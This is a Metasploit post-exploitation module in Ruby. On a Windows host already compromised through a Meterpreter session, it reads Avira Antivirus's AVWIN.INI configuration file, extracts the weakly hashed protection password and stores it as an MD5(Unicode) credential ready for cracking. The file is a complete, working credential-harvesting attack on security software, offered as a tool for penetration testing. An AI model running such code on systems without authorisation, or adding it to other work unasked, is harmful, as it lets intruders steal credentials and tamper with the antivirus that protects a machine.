##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
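class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry

  # Default location of the Avira configuration file that holds the
  # password hash. This is the only location the module checks.
  DEFAULT_CONFIG_PATH = 'C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Avira Password Extraction',
        'Description' => %q{
          This module extracts the weakly hashed password
          which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Robert Kugler / robertchrk'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_stat
            ]
          }
        }
      )
    )
  end

  # Module entry point: looks for the configuration file at its default
  # location and, if present, extracts and stores the password hash.
  #
  # @return [void]
  def run
    print_status('Checking default location...')
    check_programdata(DEFAULT_CONFIG_PATH)
  end

  # Verifies that +path+ exists on the target (stat raises when it does not)
  # and hands it to +get_ini+. Any session or parsing failure is reported
  # rather than aborting the module, so a missing file is not treated as a
  # module crash.
  #
  # @param path [String] remote path of the Avira INI file
  # @return [void]
  def check_programdata(path)
    client.fs.file.stat(path)
    print_status("Found file at #{path}")
    get_ini(path)
  rescue StandardError => e
    # Include the underlying reason: a permissions error and a parse error
    # need different follow-up from the operator.
    print_error("Error reading or processing #{path}: #{e.message}")
  end

  # Reads the INI file at +filename+ over the session, pulls the
  # COMMON/Password value and stores it as a non-replayable MD5(Unicode)
  # hash credential in the database.
  #
  # @param filename [String] remote path of AVWIN.INI
  # @return [void]
  # @raise [StandardError] session/channel errors propagate to the caller
  def get_ini(filename)
    config = client.fs.file.new(filename, 'r')
    begin
      parse = Rex::Text.to_ascii(config.read)
    ensure
      # Always release the channel; the original left it open on every path.
      config.close
    end
    ini = Rex::Parser::Ini.from_s(parse)

    if ini.empty?
      print_error('Unable to parse file')
      return
    end

    print_status('Processing configuration file...')
    # Guard against a missing section or key so a stripped-down config does
    # not surface as a bare NoMethodError in the caller's generic rescue.
    raw_passwd = ini.dig('COMMON', 'Password')
    if raw_passwd.nil?
      print_error('No COMMON/Password entry found in configuration file')
      return
    end

    passwd = raw_passwd.delete('"')
    if passwd.empty?
      print_error('COMMON/Password entry is empty; no hash to store')
      return
    end

    create_credential({
      workspace_id: myworkspace_id,
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      private_type: :nonreplayable_hash,
      jtr_format: 'Raw-MD5u', # hard coded since hash identifier wont know its unicode
      private_data: passwd,
      service_name: 'Avira Antivirus',
      status: Metasploit::Model::Login::Status::UNTRIED
    })
    print_good("MD5(Unicode) hash found: #{passwd}")
    print_good('Info: Password length is limited to 20 characters.')
  end
end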